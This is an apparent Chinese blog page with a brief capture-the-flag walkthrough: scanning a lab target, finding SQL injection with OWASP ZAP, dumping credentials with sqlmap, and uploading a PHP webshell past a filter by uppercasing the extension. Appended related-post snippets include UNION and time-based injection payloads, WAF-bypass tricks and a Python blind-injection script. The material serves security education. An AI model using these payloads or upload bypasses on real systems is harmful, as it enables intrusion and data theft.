CTF-SQL注入漏洞(get)

最新推荐文章于 2024-11-13 14:10:50 发布
原创 最新推荐文章于 2024-11-13 14:10:50 发布 · 484 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全性测试 #web安全 #安全

本文通过一个实战案例介绍如何进行渗透测试,包括使用OWASPZAP扫描web漏洞、利用sqlmap进行SQL注入攻击获取账户密码,最终成功上传webshell完成攻击。

1.老规矩全面扫描,就一个ssh和http,突破点肯定在http

2.登上这网站,看看能不能登录后台,发现需要账户密码

3.用OWASP ZAP扫描web漏洞,找到个SQL注入漏洞

3.利用sqlmap从数据库中找出账户密码

(1)将ZAP扫描出的url复制下来,-dbs先查询数据库名,第一个是默认数据库,很明显我们要的是photoblog

(2) --tables 查表名,账号密码肯定在users里

 

(3) --columns查字段名

 

(4)--dump得到账户以及密码哈希值,并破解

4.登陆后台,制作并上传shell

(1)生成webshell

发现不让传

 

尝试将php大写躲避审查,上传成功

(2)监听shell

(3)点击shell即可启动webshell

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

CTFSQL注入get
YkingH的博客
07-09 1001
CTFWEBSQL注入 SQL注入漏洞介绍 sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序,而这些输入大都是sql语法里的一些组合,通过执行sql语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 sql注入产生的原因,通常表现在: 不当的类型处理 不安全的数据库配置 不合理的查询集处理 不当的错误处理 转义字符处理不合适 多个提交处理不当 信息探测 扫描主机服务信息及服务版本 nmap -sV 靶机ip地址 快速扫描主机全部信息 nmap
iwebsec--sql注入漏洞
追求卓越,技术流~
11-20 1992
sql注入漏洞
SQL注入漏洞-GET注入
HacHunter的博客
03-05 3199
SQL 注入是一种攻击方式,在这种攻击方式中,恶意代码被插入到字符串中,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。 SQL 注入的主要形式包括直接将代码插入到与 SQL 命令串联在一起并使其得以执行的用户输入变量。一种间接的攻击会将恶意代码注入要在表中存储或作为元数据存储的字符串。在存储的字符串随后串连到一个动态 SQ
sql注入get型)漏洞
qq_58970968的博客
03-29 2225
1,概念 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 一,攻击过程 信息探测 kali里面主要下面三个探测方式: ·扫描主机服务信息以及服务版本 -- nmap -sV 靶场IP地址 如下图所示: ·快速扫描主机全部信息 -- nmap -T4 -A -v 靶场IP地址 这个与上面的比较起来扫描时间会更多,但信息会更
SQL 注入漏洞检测与利用
优快云
03-31 7004
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句.
ctf题库--简单的sql注入
miko2018的博客
08-21 6145
<题目> mysql报错注入 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/index_3.php <解答> 1.打开题目链接,在查询中输入1,发现地址栏变化。 2.认为这里可能(看题目其实知道是一定)存在一个sql注入。 3.使用工具sqlmap进行注入(以该地址栏id值为例)。 查看当前数据库: Sqlmap -u "...
6-1CTF夺旗入门教程--SQL注入GET参数
高冷的宅先生
04-05 920
1.SQL注入漏洞介绍 SQL注入产生的原因主要为以下几方面: 不当的类型处理 不安全的数据库配置 不合理的查询集处理 不当的错误处理 不当的转义字符处理 不当的多个提交处理 2.信息探测 #扫描服务器信息及服务版本 nmap -sV 192.168.2.116 #快速扫描靶场全部信息 nmap -T4 -A -v 192.168.2.116 #探测敏感信息 nikto -host...
代码审计-Java项目审计-SQL注入漏洞
Hacker_doggy的博客
07-18 1318
代码审计必备知识点:1、代码审计开始前准备:环境搭建使用,工具插件安装使用,掌握各种漏洞原理及利用,代码开发类知识点。2、代码审计前信息收集:审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等。3、代码审计挖掘漏洞根本:可控变量及特定函数,不存在过滤或过滤不严谨可以绕过导致的安全漏洞。4、代码审计展开计划:审计项目漏洞原理->审计思路->完整源码->应用框架->验证并利用漏洞。代码审计两种方法:功能点或关键字分析可能存在的漏洞
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 1085
SQL注入getshell靶机实战
CTF练习:SQL注入get参数注入
qq_43233085的博客
11-24 4240
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
CTF-SQL注入GET)图文讲解
weixin_45441727的博客
03-19 1362
首先进行靶机发现 netdiscover -r 靶机IP网段 发现靶机192.168.1.115 进行nmap扫描版本号 nmap -sV 192.168.1.115 扫描隐藏内容 dirb http://192.168.1.115:80 发现登录界面index.php 使用kail自带的http扫描工具owasp—zap 进入界面后输入靶机IP,点击攻击 点击警报,发现存在SQL注入 ...
SQL 注入 -转载
一往如前的博客
11-30 410
转载于:谢公子 https://blog.youkuaiyun.com/qq_36119192/article/details/81987834 目录 一:Boolean盲注 二:union 注入 三:文件读写 四:floor报错注入 五:Xpath函数错误注入 六:sleep延时注入 七:REGEXP正则匹配 八:宽字节注入 九:过滤绕过 判断是否存在SQL注入 一个网站...
sql注入初探
小小鱼的博客
09-14 1890
了解漏洞: 什么是sql注入漏洞: 攻击者可以通过该漏洞提交一段数据库查询代码,根据程序返回的结果,获得非法数据。 分析漏洞原理: SQL注入产生的原因是什么: 程序员在编写代码的时候,没有对用户输入内容的合法性进行判断。 一个系统存在这个漏洞会导致什么后果? 数据库中的信息将会被黑客获取,如果数据库权限设置不当,还可能被攻击者获取写权限,写入一句话木马。 漏洞的复现和利用 环境...
SQL注入基础知识.
qq_44640313的博客
12-03 448
sql注入基础知识
OWASP学习之SQL注入
s11show_163的博客
02-28 1170
一、sql注入注入点: 参数名 参数值 cookie 目录文件名 工具:sev3wvs或者啊D注入 是否存在sql注入: select * from news where id = 3-1' ##加单引号如果id=1‘、id=2‘、id=-1’、id=1 and 1=1‘ ##以及id=1‘ and1=2‘的返回结果不一样则说明存在注入。 ##也可以取消后面的单引号用‘#’或者‘...
sql注入详解(非常详细),零基础入门到精通,看这一篇就够了
隔壁王叔的博客
11-13 1892
sql注入详解(非常详细),零基础入门到精通,看这一篇就够了
sql注入-安全测试必备“7”个工具
2401_84466359的博客
04-28 3636
SQL注入是一种常见的网络攻击方法,用于操作数据库管理系统,通过执行恶意的SQL语句来窃取或破坏数据。为了防御SQL注入攻击,了解和使用一些专业工具进行安全测试是非常有用的。以下是七个用于发现和测试SQL注入漏洞的重要工具,这些工具可帮助网络安全专业人士评估和加强应用程序的安全性
反渗透,sql注入漏洞扫描工具
fengbin2005的专栏
09-15 1185
程序漏洞扫描 xss漏洞查找
帮助检测SQL注入漏洞的工具
weixin_68416970的博客
08-26 1294
最新的信息显示,SQLMap和Burp Suite可以结合使用,通过Burp Suite的插件(如SQLMap4Burp-Plus-Plus),可以将SQLMap的自动化功能集成到Burp Suite的工作流程中,这样可以在Burp Suite的界面中实时显示SQLMap的检测结果和进度,提高了工作效率和精度。用户应根据自己的具体需求和偏好选择合适的工具。:这是一个集成的网络应用安全测试平台,包含多个工具,用于执行包括SQL注入在内的各种攻击,提供详尽的HTTP请求编辑器,可以手动测试SQL注入
CTF比赛 SQL注入题目解析
最新发布
08-10
CTF比赛中,SQL注入题目是常见且复杂的挑战之一,通常需要选手具备对SQL语法、数据库结构和安全机制的深入理解。这类题目往往模拟了现实世界中Web应用的安全漏洞,要求选手通过注入手段获取数据库中的敏感信息,例如flag。 ### 解题思路与方法 #### 1. 判断注入点 在开始解题之前,需要确认目标是否存在SQL注入漏洞。常见的判断方式包括: - **报错注入**:尝试输入 `'` 或 `"`,观察是否出现SQL语法错误。 - **布尔盲注**:通过构造如 `' AND 1=1 -- -` 和 `' AND 1=2 -- -` 的语句,观察页面响应是否发生变化。 - **时间盲注**:使用 `SLEEP()` 函数(如 `' AND (SELECT 8375 FROM (SELECT(SLEEP(5)))Apbf) -- -`)判断是否能触发延迟响应[^2]。 #### 2. 数据库信息探测 在确认注入点后,第一步是获取数据库的基本信息,包括数据库名、表名和列名。常用的注入语句如下: - 获取数据库名: ```sql -1' UNION SELECT 1,2,database() -- - ``` - 获取所有数据库名: ```sql -1' UNION SELECT 1,2,group_concat(schema_name) FROM information_schema.schemata -- - ``` - 获取指定数据库下的表名: ```sql -1' UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema='ctfhub' -- - [^3] ``` - 获取指定表的列名: ```sql -1' UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name='fl4g' -- - [^4] ``` #### 3. 绕过WAF(Web Application Firewall) 许多CTF题目会模拟WAF的过滤机制,例如对 `UNION`, `SELECT`, `AND`, `OR` 等关键字进行过滤。此时需要采用以下绕过策略: - **大小写混合**:例如 `UnIoN SeLeCt`。 - **编码绕过**:使用十六进制、Base64 或 Unicode 编码。 - **空格替换**:使用 `/**/`, `%0a`, `%09` 等替代空格。 - **逻辑运算绕过**:使用 `^`, `&`, `|` 等位运算符替代 `AND` 或 `OR`。 #### 4. 获取Flag 在获取到目标表和列名后,最后一步是查询flag值。例如: ```sql -1' UNION SELECT 1,2,flag FROM fl4g -- - ``` 如果flag被存储在其他表中,可以根据表结构构造对应的查询语句。 #### 5. 自动化脚本编写 由于手动注入效率较低,尤其在时间盲注或布尔盲注场景中,通常需要编写自动化脚本。Python结合 `requests` 库和 `BeautifulSoup` 可用于实现自动化注入脚本,示例如下: ```python import requests url = "http://example.com/vulnerable_page" cookies = {"PHPSESSID": "your_session_id"} def inject(query): payload = f"' AND {query} AND '1'='1" params = {"search": payload} response = requests.get(url, params=params, cookies=cookies) return "flag" in response.text # 根据响应判断是否成功 # 示例:判断数据库名长度 for i in range(1, 10): query = f"(SELECT LENGTH(database()) = {i})" if inject(query): print(f"Database name length is {i}") break ``` ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Reaches_r

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值